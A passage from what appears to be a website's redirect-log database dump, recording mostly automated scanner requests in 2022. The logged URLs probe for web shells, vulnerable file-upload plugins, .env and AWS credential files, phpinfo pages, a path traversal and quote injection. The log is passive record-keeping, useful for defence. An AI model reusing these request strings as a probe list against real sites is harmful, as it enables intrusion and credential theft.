00:00:00',301),(23550,'https://ekvatorprint.com.ua/w3llstore.php',NULL,'','',5,0,'2022-05-04 01:34:54','0000-00-00 00:00:00',301),(23551,'https://ekvatorprint.com.ua/foxwso-full.php',NULL,'','',1,0,'2022-05-04 01:35:08','0000-00-00 00:00:00',301),(23552,'https://ekvatorprint.com.ua/foxwso.php',NULL,'','',6,0,'2022-05-04 01:35:13','0000-00-00 00:00:00',301),(23553,'https://ekvatorprint.com.ua/lnedx.php',NULL,'','',1,0,'2022-05-04 01:35:46','0000-00-00 00:00:00',301),(23554,'https://ekvatorprint.com.ua/sys.php',NULL,'','',1,0,'2022-05-04 01:35:51','0000-00-00 00:00:00',301),(23555,'https://ekvatorprint.com.ua/minik.php',NULL,'','',1,0,'2022-05-04 01:36:09','0000-00-00 00:00:00',301),(23556,'https://ekvatorprint.com.ua/wpindex.php',NULL,'','',9,0,'2022-05-04 01:36:14','0000-00-00 00:00:00',301),(23557,'https://ekvatorprint.com.ua/alfakun.php',NULL,'','',1,0,'2022-05-04 01:38:40','0000-00-00 00:00:00',301),(23558,'https://ekvatorprint.com.ua/wp/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:06','0000-00-00 00:00:00',301),(23559,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:11','0000-00-00 00:00:00',301),(23560,'https://ekvatorprint.com.ua/blog/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:15','0000-00-00 00:00:00',301),(23561,'https://ekvatorprint.com.ua/new/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:19','0000-00-00 00:00:00',301),(23562,'https://ekvatorprint.com.ua/test/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:24','0000-00-00 00:00:00',301),(23563,'https://ekvatorprint.com.ua/old/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:28','0000-00-00 00:00:00',301),(23564,'https://ekvatorprint.com.ua/backup/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php',NULL,'','',1,0,'2022-05-04 01:39:32','0000-00-00 00:00:00',301),(23565,'https://ekvatorprint.com.ua/assets/admin/kcfinder/upload.php',NULL,'','',1,0,'2022-05-04 01:39:56','0000-00-00 00:00:00',301),(23566,'https://ekvatorprint.com.ua/admin/assets/js/ckeditor/kcfinder/upload.php',NULL,'','',1,0,'2022-05-04 01:40:11','0000-00-00 00:00:00',301),(23567,'https://ekvatorprint.com.ua/assets/admin/js/filemanager/dialog.php',NULL,'','',1,0,'2022-05-04 01:40:29','0000-00-00 00:00:00',301),(23568,'https://ekvatorprint.com.ua/assets/plugins/filemanager/dialog.php',NULL,'','',3,0,'2022-05-04 01:40:33','0000-00-00 00:00:00',301),(23569,'https://ekvatorprint.com.ua/assets/filemanager/dialog.php',NULL,'','',3,0,'2022-05-04 01:40:36','0000-00-00 00:00:00',301),(23570,'https://ekvatorprint.com.ua/admin/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2022-05-04 01:40:40','0000-00-00 00:00:00',301),(23571,'https://ekvatorprint.com.ua/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-04 09:53:21','0000-00-00 00:00:00',301),(23572,'https://ekvatorprint.com.ua/assets/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-05-06 13:32:15','0000-00-00 00:00:00',301),(23573,'https://ekvatorprint.com.ua/radio.txt',NULL,'','',2,0,'2022-05-06 18:38:51','0000-00-00 00:00:00',301),(23574,'https://ekvatorprint.com.ua/php_info.php',NULL,'','',2,0,'2022-05-07 03:50:12','0000-00-00 00:00:00',301),(23575,'https://ekvatorprint.com.ua/pinfo.php',NULL,'','',1,0,'2022-05-07 07:46:40','0000-00-00 00:00:00',301),(23576,'https://ekvatorprint.com.ua/infophp.php',NULL,'','',2,0,'2022-05-07 11:34:03','0000-00-00 00:00:00',301),(23577,'https://ekvatorprint.com.ua/admin_phpinfo.php',NULL,'','',2,0,'2022-05-07 16:18:41','0000-00-00 00:00:00',301),(23578,'https://ekvatorprint.com.ua/linusadmin-phpinfo.php',NULL,'','',1,0,'2022-05-07 17:44:18','0000-00-00 00:00:00',301),(23579,'https://ekvatorprint.com.ua/nuked-clan/index.php?file=news.aws/credentialsop=phpinfo',NULL,'','',1,0,'2022-05-07 20:54:40','0000-00-00 00:00:00',301),(23580,'https://ekvatorprint.com.ua/assets/plugins/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-05-08 01:20:48','0000-00-00 00:00:00',301),(23581,'https://ekvatorprint.com.ua/phpversion.php',NULL,'','',1,0,'2022-05-08 10:16:24','0000-00-00 00:00:00',301),(23582,'https://ekvatorprint.com.ua/time.php',NULL,'','',1,0,'2022-05-08 18:42:06','0000-00-00 00:00:00',301),(23583,'https://ekvatorprint.com.ua/include/thumb.php?dir=http\\..\\admin\\login\\login_check.php',NULL,'http://ekvatorprint.com.ua/include/thumb.php?dir=http\\..\\admin\\login\\login_check.php','',2,0,'2022-05-09 00:04:53','0000-00-00 00:00:00',301),(23584,'https://ekvatorprint.com.ua/assets/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-09 12:08:23','0000-00-00 00:00:00',301),(23585,'https://ekvatorprint.com.ua/wp-plain.php',NULL,'www.google.com','',24,0,'2022-05-09 22:51:53','0000-00-00 00:00:00',301),(23586,'https://ekvatorprint.com.ua/euknhtic.php?fox=d3wl7',NULL,'www.google.com','',2,0,'2022-05-09 22:52:21','0000-00-00 00:00:00',301),(23587,'https://ekvatorprint.com.ua/xxegcxft.php?fox=d3wl7',NULL,'www.google.com','',2,0,'2022-05-10 21:41:54','0000-00-00 00:00:00',301),(23588,'https://ekvatorprint.com.ua/plugins/elfinder/php/connector.minimal.php',NULL,'','',1,0,'2022-05-10 22:03:20','0000-00-00 00:00:00',301),(23589,'https://ekvatorprint.com.ua/assets/plugins/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-12 10:52:40','0000-00-00 00:00:00',301),(23590,'https://ekvatorprint.com.ua/db/.env',NULL,'','',3,0,'2022-05-13 20:31:32','0000-00-00 00:00:00',301),(23591,'https://ekvatorprint.com.ua/opt/.env',NULL,'','',1,0,'2022-05-13 20:31:32','0000-00-00 00:00:00',301),(23592,'https://ekvatorprint.com.ua/admin/assets/elfinder/php/connector.php',NULL,'','',1,0,'2022-05-13 21:29:26','0000-00-00 00:00:00',301),(23593,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/nzurokjd/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-14 20:56:13','0000-00-00 00:00:00',301),(23594,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/oumwkfaf/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-14 20:56:22','0000-00-00 00:00:00',301),(23595,'https://ekvatorprint.com.ua/svywrbdb.php?fox=d3wl7',NULL,'www.google.com','',2,0,'2022-05-15 00:28:38','0000-00-00 00:00:00',301),(23596,'https://ekvatorprint.com.ua/yqkxuend.php?fox=d3wl7',NULL,'www.google.com','',2,0,'2022-05-15 02:16:13','0000-00-00 00:00:00',301),(23597,'https://ekvatorprint.com.ua/assets/plugins/kcfinder/upload.php',NULL,'','',1,0,'2022-05-15 23:22:43','0000-00-00 00:00:00',301),(23598,'https://ekvatorprint.com.ua/phpformbuilder/plugins/filemanager/dialog.php',NULL,'','',1,0,'2022-05-15 23:22:51','0000-00-00 00:00:00',301),(23599,'https://ekvatorprint.com.ua/assets/tinymce/plugins/filemanager/dialog.php',NULL,'','',1,0,'2022-05-15 23:22:52','0000-00-00 00:00:00',301),(23600,'https://ekvatorprint.com.ua/phpinfos.php',NULL,'','',1,0,'2022-05-16 02:49:05','0000-00-00 00:00:00',301),(23601,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/pfycmzsv/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-17 19:56:33','0000-00-00 00:00:00',301),(23602,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/ogwdadjn/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-17 19:56:43','0000-00-00 00:00:00',301),(23603,'https://ekvatorprint.com.ua/wp-content',NULL,'','',1,0,'2022-05-18 02:16:56','0000-00-00 00:00:00',301),(23604,'https://ekvatorprint.com.ua/core',NULL,'','',1,0,'2022-05-18 02:16:56','0000-00-00 00:00:00',301),(23605,'https://ekvatorprint.com.ua/staging',NULL,'','',1,0,'2022-05-18 02:16:58','0000-00-00 00:00:00',301),(23606,'https://ekvatorprint.com.ua/.avs/credentials',NULL,'','',1,0,'2022-05-18 06:51:02','0000-00-00 00:00:00',301),(23607,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/zjvddlyt/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-18 10:36:51','0000-00-00 00:00:00',301),(23608,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/pncpymsu/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-18 10:36:59','0000-00-00 00:00:00',301),(23609,'https://ekvatorprint.com.ua/assets/plugins/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-18 14:58:08','0000-00-00 00:00:00',301),(23610,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/qlweskff/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-18 21:37:20','0000-00-00 00:00:00',301),(23611,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/fsdvewvh/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-18 21:37:28','0000-00-00 00:00:00',301),(23612,'https://ekvatorprint.com.ua/plugins/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-20 12:27:36','0000-00-00 00:00:00',301),(23613,'https://ekvatorprint.com.ua/hhoqv3ndp7',NULL,'','',1,0,'2022-05-20 13:48:22','0000-00-00 00:00:00',301),(23614,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/bqcbyzbk/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-21 04:16:59','0000-00-00 00:00:00',301),(23615,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/lmfgwnmk/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-21 04:17:03','0000-00-00 00:00:00',301),(23616,'https://ekvatorprint.com.ua/wp-content/uploads/2022/05/',NULL,'','',2,0,'2022-05-21 08:26:37','0000-00-00 00:00:00',301),(23617,'https://ekvatorprint.com.ua/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-22 03:05:23','0000-00-00 00:00:00',301),(23618,'https://ekvatorprint.com.ua/a845e09c02dac84fcf5f49886edb010b?r=\'\"\\&utm_source=1\'\"\\',NULL,'https://ekvatorprint.com.ua/index.html?r=\'\"\\&utm_source=1\'\"\\','',169,0,'2022-05-22 16:19:44','0000-00-00 00:00:00',301),(23619,'https://ekvatorprint.com.ua/a845e09c02dac84fcf5f49886edb010b?r=\'\"\\&utm_source=1\'\"\\',NULL,'https://ekvatorprint.com.ua/?r=%27','',1,0,'2022-05-22 16:19:44','0000-00-00 00:00:00',301),(23620,'https://ekvatorprint.com.ua/contacty/',NULL,'','',1,0,'2022-05-23 23:35:32','0000-00-00 00:00:00',301),(23621,'https://ekvatorprint.com.ua/admin/jqueryupload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-24 04:00:36','0000-00-00 00:00:00',301),(23622,'https://ekvatorprint.com.ua/test1.php',NULL,'','',1,0,'2022-05-24 05:51:06','0000-00-00 00:00:00',301),(23623,'https://ekvatorprint.com.ua/_index.php',NULL,'','',1,0,'2022-05-24 05:51:06','0000-00-00 00:00:00',301),(23624,'https://ekvatorprint.com.ua/php',NULL,'','',1,0,'2022-05-24 05:51:07','0000-00-00 00:00:00',301),(23625,'https://ekvatorprint.com.ua/phpsecinfo',NULL,'','',1,0,'2022-05-24 05:51:07','0000-00-00 00:00:00',301),(23626,'https://ekvatorprint.com.ua/pma',NULL,'','',2,0,'2022-05-24 05:51:07','0000-00-00 00:00:00',301),(23627,'https://ekvatorprint.com.ua/dbadmin',NULL,'','',1,0,'2022-05-24 05:51:08','0000-00-00 00:00:00',301),(23628,'https://ekvatorprint.com.ua/mysql',NULL,'','',1,0,'2022-05-24 05:51:08','0000-00-00 00:00:00',301),(23629,'https://ekvatorprint.com.ua/myadmin',NULL,'','',1,0,'2022-05-24 05:51:08','0000-00-00 00:00:00',301),(23630,'https://ekvatorprint.com.ua/api/',NULL,'','',1,0,'2022-05-24 05:51:08','0000-00-00 00:00:00',301),(23631,'https://ekvatorprint.com.ua/data/',NULL,'','',1,0,'2022-05-24 05:51:08','0000-00-00 00:00:00',301),(23632,'https://ekvatorprint.com.ua/search/',NULL,'','',1,0,'2022-05-24 05:51:09','0000-00-00 00:00:00',301),(23633,'https://ekvatorprint.com.ua/login.php',NULL,'','',1,0,'2022-05-24 05:51:09','0000-00-00 00:00:00',301),(23634,'https://ekvatorprint.com.ua/profile.php',NULL,'','',1,0,'2022-05-24 05:51:10','0000-00-00 00:00:00',301),(23635,'https://ekvatorprint.com.ua/memberlist.php',NULL,'','',1,0,'2022-05-24 05:51:10','0000-00-00 00:00:00',301),(23636,'https://ekvatorprint.com.ua/register.php',NULL,'','',1,0,'2022-05-24 05:51:10','0000-00-00 00:00:00',301),(23637,'https://ekvatorprint.com.ua/misc.php',NULL,'','',1,0,'2022-05-24 05:51:10','0000-00-00 00:00:00',301),(23638,'https://ekvatorprint.com.ua/report.php',NULL,'','',1,0,'2022-05-24 05:51:10','0000-00-00 00:00:00',301),(23639,'https://ekvatorprint.com.ua/editpost.php',NULL,'','',1,0,'2022-05-24 05:51:11','0000-00-00 00:00:00',301),(23640,'https://ekvatorprint.com.ua/member.php',NULL,'','',1,0,'2022-05-24 05:51:11','0000-00-00 00:00:00',301),(23641,'https://ekvatorprint.com.ua/online.php',NULL,'','',1,0,'2022-05-24 05:51:11','0000-00-00 00:00:00',301),(23642,'https://ekvatorprint.com.ua/subscription.php',NULL,'','',1,0,'2022-05-24 05:51:11','0000-00-00 00:00:00',301),(23643,'https://ekvatorprint.com.ua/attachment.php',NULL,'','',1,0,'2022-05-24 05:51:12','0000-00-00 00:00:00',301),(23644,'https://ekvatorprint.com.ua/faq.php',NULL,'','',1,0,'2022-05-24 05:51:12','0000-00-00 00:00:00',301),(23645,'https://ekvatorprint.com.ua/moderator.php',NULL,'','',1,0,'2022-05-24 05:51:12','0000-00-00 00:00:00',301),(23646,'https://ekvatorprint.com.ua/account.php',NULL,'','',1,0,'2022-05-24 05:51:13','0000-00-00 00:00:00',301),(23647,'https://ekvatorprint.com.ua/rss.php',NULL,'','',6,0,'2022-05-24 05:51:13','0000-00-00 00:00:00',301),(23648,'https://ekvatorprint.com.ua/cart.php',NULL,'','',1,0,'2022-05-24 05:51:13','0000-00-00 00:00:00',301),(23649,'https://ekvatorprint.com.ua/search',NULL,'','',1,0,'2022-05-24 05:51:14','0000-00-00 00:00:00',301),(23650,'https://ekvatorprint.com.ua/user',NULL,'','',1,0,'2022-05-24 05:51:14','0000-00-00 00:00:00',301),(23651,'https://ekvatorprint.com.ua/stats',NULL,'','',1,0,'2022-05-24 05:51:15','0000-00-00 00:00:00',301),(23652,'https://ekvatorprint.com.ua/misc',NULL,'','',1,0,'2022-05-24 05:51:15','0000-00-00 00:00:00',301),(23653,'https://ekvatorprint.com.ua/comment',NULL,'','',1,0,'2022-05-24 05:51:15','0000-00-00 00:00:00',301),(23654,'https://ekvatorprint.com.ua/profiles',NULL,'','',1,0,'2022-05-24 05:51:16','0000-00-00 00:00:00',301),(23655,'https://ekvatorprint.com.ua/logout',NULL,'','',1,0,'2022-05-24 05:51:16','0000-00-00 00:00:00',301),(23656,'https://ekvatorprint.com.ua/component/',NULL,'','',1,0,'2022-05-24 05:51:20','0000-00-00 00:00:00',301),(23657,'https://ekvatorprint.com.ua/index.php?option=com_xmap&sitemap=1',NULL,'','',44,0,'2022-05-24 05:51:20','0000-00-00 00:00:00',301),(23658,'https://ekvatorprint.com.ua/company/',NULL,'','',1,0,'2022-05-24 22:31:39','0000-00-00 00:00:00',301),(23659,'https://ekvatorprint.com.ua/shop',NULL,'www.google.com','',4,0,'2022-05-25 01:51:59','0000-00-00 00:00:00',301),(23660,'https://ekvatorprint.com.ua/store',NULL,'www.google.com','',4,0,'2022-05-25 01:52:03','0000-00-00 00:00:00',301),(23661,'https://ekvatorprint.com.ua/2017',NULL,'www.google.com','',2,0,'2022-05-25 01:54:17','0000-00-00 00:00:00',301),(23662,'https://ekvatorprint.com.ua/2016',NULL,'www.google.com','',2,0,'2022-05-25 01:54:27','0000-00-00 00:00:00',301),(23663,'https://ekvatorprint.com.ua/2015',NULL,'www.google.com','',2,0,'2022-05-25 01:54:30','0000-00-00 00:00:00',301),(23664,'https://ekvatorprint.com.ua/2014',NULL,'www.google.com','',2,0,'2022-05-25 01:54:39','0000-00-00 00:00:00',301),(23665,'https://ekvatorprint.com.ua/2013',NULL,'www.google.com','',2,0,'2022-05-25 01:54:47','0000-00-00 00:00:00',301),(23666,'https://ekvatorprint.com.ua/2012',NULL,'www.google.com','',2,0,'2022-05-25 01:54:50','0000-00-00 00:00:00',301),(23667,'https://ekvatorprint.com.ua/2010',NULL,'www.google.com','',2,0,'2022-05-25 01:55:00','0000-00-00 00:00:00',301),(23668,'https://ekvatorprint.com.ua/2009',NULL,'www.google.com','',2,0,'2022-05-25 01:55:08','0000-00-00 00:00:00',301),(23669,'https://ekvatorprint.com.ua/wp-admin/wp-login.php',NULL,'http://ekvatorprint.com.ua/wp-admin/wp-login.php','',1,0,'2022-05-25 08:35:35','0000-00-00 00:00:00',301),(23670,'https://ekvatorprint.com.ua/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-25 16:21:23','0000-00-00 00:00:00',301),(23671,'https://ekvatorprint.com.ua/about/',NULL,'','',1,0,'2022-05-26 06:39:46','0000-00-00 00:00:00',301),(23672,'https://ekvatorprint.com.ua/e0watlqwpda/cwmiotmq0a/gskc7c3feayzw/balkst17hepbkde/imnyv9zims',NULL,'','',1,0,'2022-05-26 09:20:08','0000-00-00 00:00:00',301),(23673,'https://ekvatorprint.com.ua/public/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-27 03:27:42','0000-00-00 00:00:00',301),(23674,'https://ekvatorprint.com.ua/o-kompanii/',NULL,'','',1,0,'2022-05-27 11:55:24','0000-00-00 00:00:00',301),(23675,'https://ekvatorprint.com.ua/wordpress/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 00:31:11','0000-00-00 00:00:00',301),(23676,'https://ekvatorprint.com.ua/site/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 00:31:33','0000-00-00 00:00:00',301),(23677,'https://ekvatorprint.com.ua/wp-content/index.php',NULL,'www.google.com','',1,0,'2022-05-28 00:32:04','0000-00-00 00:00:00',301),(23678,'https://ekvatorprint.com.ua/wp/wp-includes/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 00:33:07','0000-00-00 00:00:00',301),(23679,'https://ekvatorprint.com.ua/wordpress/wp-includes/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 00:33:35','0000-00-00 00:00:00',301),(23680,'https://ekvatorprint.com.ua/blog/wp-class.php',NULL,'www.google.com','',1,0,'2022-05-28 00:34:04','0000-00-00 00:00:00',301),(23681,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/hcuhasyu/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-28 08:39:24','0000-00-00 00:00:00',301),(23682,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/zcyswmjf/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-28 08:39:34','0000-00-00 00:00:00',301),(23683,'https://ekvatorprint.com.ua/admin/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-28 13:26:20','0000-00-00 00:00:00',301),(23684,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/dlrrkysp/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-29 22:08:54','0000-00-00 00:00:00',301),(23685,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/ajkjjdcj/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-29 22:09:34','0000-00-00 00:00:00',301),(23686,'https://ekvatorprint.com.ua/admin/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-30 01:24:08','0000-00-00 00:00:00',301),(23687,'https://ekvatorprint.com.ua/assets/admin/plugins/jquery-file-upload/server/php/',NULL,'','',1,0,'2022-05-30 05:36:23','0000-00-00 00:00:00',301),(23688,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/gximwgqe/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-30 15:14:03','0000-00-00 00:00:00',301),(23689,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/ryywgzrr/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-05-30 15:14:13','0000-00-00 00:00:00',301),(23690,'https://ekvatorprint.com.ua/yeo.php',NULL,'','',1,0,'2022-05-31 06:33:38','0000-00-00 00:00:00',301),(23691,'https://ekvatorprint.com.ua/theme/assets/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-05-31 12:28:52','0000-00-00 00:00:00',301),(23692,'https://ekvatorprint.com.ua/fotoredaktor\'',NULL,'','',1,0,'2022-05-31 23:42:44','0000-00-00 00:00:00',301),(23693,'https://ekvatorprint.com.ua/wp-rmd.php',NULL,'','',1,0,'2022-06-01 05:29:46','0000-00-00 00:00:00',301),(23694,'https://ekvatorprint.com.ua/oldindex.php',NULL,'','',1,0,'2022-06-01 05:29:46','0000-00-00 00:00:00',301),(23695,'https://ekvatorprint.com.ua/contacts.html',NULL,'','',1,0,'2022-06-01 18:52:47','0000-00-00 00:00:00',301),(23696,'https://ekvatorprint.com.ua/jbtsabyjfk47feq4e0fejngut5qsb',NULL,'','',1,0,'2022-06-01 19:57:42','0000-00-00 00:00:00',301),(23697,'https://ekvatorprint.com.ua/fileupload/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2022-06-01 20:58:40','0000-00-00 00:00:00',301),(23698,'https://ekvatorprint.com.ua/assets/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-03 06:18:39','0000-00-00 00:00:00',301),(23699,'https://ekvatorprint.com.ua/company.html',NULL,'','',1,0,'2022-06-03 09:42:12','0000-00-00 00:00:00',301),(23700,'https://ekvatorprint.com.ua/admin/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-04 16:14:59','0000-00-00 00:00:00',301),(23701,'https://ekvatorprint.com.ua/?format=feed&type=atom',NULL,'','',1,0,'2022-06-05 04:52:48','0000-00-00 00:00:00',301),(23702,'https://ekvatorprint.com.ua/feed.xml',NULL,'','',1,0,'2022-06-05 04:53:16','0000-00-00 00:00:00',301),(23703,'https://ekvatorprint.com.ua/index.php?format=feed&type=rss',NULL,'','',1,0,'2022-06-05 04:57:46','0000-00-00 00:00:00',301),(23704,'https://ekvatorprint.com.ua/feed/atom',NULL,'','',1,0,'2022-06-05 05:02:59','0000-00-00 00:00:00',301),(23705,'https://ekvatorprint.com.ua/feed/atom/',NULL,'','',1,0,'2022-06-05 05:06:32','0000-00-00 00:00:00',301),(23706,'https://ekvatorprint.com.ua/atom/',NULL,'','',1,0,'2022-06-05 05:14:05','0000-00-00 00:00:00',301),(23707,'https://ekvatorprint.com.ua/aszqohng.php?fox=d3wl7',NULL,'www.google.com','',2,0,'2022-06-05 16:07:03','0000-00-00 00:00:00',301),(23708,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/prifufpq/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-06-05 22:16:01','0000-00-00 00:00:00',301),(23709,'https://ekvatorprint.com.ua/wp-content/uploads/typehub/custom/rvkzaqjw/.sp3ctra_xo.php?fox=d3wl7',NULL,'www.google.com','',1,0,'2022-06-05 22:16:50','0000-00-00 00:00:00',301),(23710,'https://ekvatorprint.com.ua/admin/assets/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-06 10:50:00','0000-00-00 00:00:00',301),(23711,'https://ekvatorprint.com.ua/credentials/credentials',NULL,'','',1,0,'2022-06-07 07:38:12','0000-00-00 00:00:00',301),(23712,'https://ekvatorprint.com.ua/about.html',NULL,'','',1,0,'2022-06-07 17:23:51','0000-00-00 00:00:00',301),(23713,'https://ekvatorprint.com.ua/credentials',NULL,'','',1,0,'2022-06-07 17:49:44','0000-00-00 00:00:00',301),(23714,'https://ekvatorprint.com.ua/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-07 20:30:20','0000-00-00 00:00:00',301),(23715,'https://ekvatorprint.com.ua/assets/plugins/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-09 05:56:39','0000-00-00 00:00:00',301),(23716,'https://ekvatorprint.com.ua/wp-content/mu-plugins-old/index.php?f=/bmluxzleairiek7s/umvusxn4hvg3bzrf.txt',NULL,'','',1,0,'2022-06-09 20:02:09','0000-00-00 00:00:00',301),(23717,'https://ekvatorprint.com.ua/contact.html',NULL,'','',1,0,'2022-06-10 13:16:56','0000-00-00 00:00:00',301),(23718,'https://ekvatorprint.com.ua/marijuana.php',NULL,'','',8,0,'2022-06-10 14:37:05','0000-00-00 00:00:00',301),(23719,'https://ekvatorprint.com.ua/deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php',NULL,'','',4,0,'2022-06-10 14:37:15','0000-00-00 00:00:00',301),(23720,'https://ekvatorprint.com.ua/wp-admin/xleet.php',NULL,'','',4,0,'2022-06-10 14:37:17','0000-00-00 00:00:00',301),(23721,'https://ekvatorprint.com.ua/wp-admin/fx.php',NULL,'','',4,0,'2022-06-10 14:37:18','0000-00-00 00:00:00',301),(23722,'https://ekvatorprint.com.ua/utchiha.php',NULL,'','',4,0,'2022-06-10 14:37:22','0000-00-00 00:00:00',301),(23723,'https://ekvatorprint.com.ua/wp-admin/priv8.php',NULL,'','',4,0,'2022-06-10 14:37:22','0000-00-00 00:00:00',301),(23724,'https://ekvatorprint.com.ua/wp-admin/rss.php',NULL,'','',4,0,'2022-06-10 14:37:22','0000-00-00 00:00:00',301),(23725,'https://ekvatorprint.com.ua/uploads/xleet.php',NULL,'','',4,0,'2022-06-10 14:37:23','0000-00-00 00:00:00',301),(23726,'https://ekvatorprint.com.ua/alfa_data/alfacgiapi',NULL,'','',4,0,'2022-06-10 14:37:23','0000-00-00 00:00:00',301),(23727,'https://ekvatorprint.com.ua/wp-admin/fox-c',NULL,'','',4,0,'2022-06-10 14:37:24','0000-00-00 00:00:00',301),(23728,'https://ekvatorprint.com.ua/wp-admin/fox-c404',NULL,'','',4,0,'2022-06-10 14:37:24','0000-00-00 00:00:00',301),(23729,'https://ekvatorprint.com.ua/fox-c40',NULL,'','',3,0,'2022-06-10 14:37:25','0000-00-00 00:00:00',301),(23730,'https://ekvatorprint.com.ua/wp-admin/alfa_data/alfacgiapi/',NULL,'','',3,0,'2022-06-10 14:37:25','0000-00-00 00:00:00',301),(23731,'https://ekvatorprint.com.ua/wp-admin/panels.txt',NULL,'','',3,0,'2022-06-10 14:37:26','0000-00-00 00:00:00',301),(23732,'https://ekvatorprint.com.ua/panels.txt/',NULL,'','',3,0,'2022-06-10 14:37:26','0000-00-00 00:00:00',301),(23733,'https://ekvatorprint.com.ua/uploadify/uploadify.css',NULL,'','',1,0,'2022-06-10 15:29:20','0000-00-00 00:00:00',301),(23734,'https://ekvatorprint.com.ua/npcwnyqtiusxwcantwvfbr2wxyv',NULL,'','',1,0,'2022-06-11 16:49:04','0000-00-00 00:00:00',301),(23735,'https://ekvatorprint.com.ua/components/com_sexypolling/vote.php',NULL,'joomla-server.local/index.php/component/search/','',1,0,'2022-06-13 15:02:56','0000-00-00 00:00:00',301),(23736,'https://ekvatorprint.com.ua/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',2,0,'2022-06-14 05:59:52','0000-00-00 00:00:00',301),(23737,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',2,0,'2022-06-14 05:59:59','0000-00-00 00:00:00',301),(23738,'https://ekvatorprint.com.ua/site/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',2,0,'2022-06-14 06:00:01','0000-00-00 00:00:00',301),(23739,'https://ekvatorprint.com.ua/blog/wp-content/plugins/wpyii2/wpyii2.php',NULL,'','',2,0,'2022-06-14 06:00:01','0000-00-00 00:00:00',301),(23740,'https://ekvatorprint.com.ua/wp-content/plugins/dos2unix/dos2unix.php',NULL,'','',2,0,'2022-06-14 06:00:02','0000-00-00 00:00:00',301),(23741,'https://ekvatorprint.com.ua/wordpress/wp-content/plugins/dos2unix/dos2unix.php',NULL,'','',2,0,'2022-06-14 06:00:02','0000-00-00 